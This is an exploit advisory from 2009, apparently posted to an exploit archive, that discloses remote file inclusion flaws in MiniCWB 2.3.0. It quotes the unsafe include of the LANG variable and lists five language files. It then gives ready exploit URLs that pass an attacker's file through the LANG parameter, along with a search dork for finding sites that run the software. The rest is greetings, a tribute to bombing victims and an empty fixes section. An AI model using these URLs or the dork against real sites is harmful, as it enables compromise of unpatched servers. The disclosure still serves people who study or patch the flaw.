MiniCWB 2.3.0 (LANG) Remote File Inclusion Vulnerabilities

2009-07-20 19:03:24

================================================================================================


[o] MiniCWB 2.3.0 Multiple Remote File Inclusion Vulnerability

Software : MiniCWB version 2.3.0
Vendor : http://www.grafxsoftware.com/
Download : http://www.grafxsoftware.com/login.php?action=form&url=download.php
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com


================================================================================================


[o] Vulnerable file


include($LANG.".extra.php");

language/en.inc.php
language/hu.inc.php
language/no.inc.php
language/ro.inc.php
language/ru.inc.php




[o] Exploit

http://localhost/[path]/language/en.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]



[o] Dork

"Powered by MiniCWB"


================================================================================================


[o] Greetz

MainHack BrotherHood [ http://news.serverisdown.org ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke



[o] Special

All victim Jakarta Explosion in JW Marriot and The Ritz-Carlton [ Friday July 17 2009 ]
fuck terorism!! you're not make us afraid but you make us more stronger.


================================================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.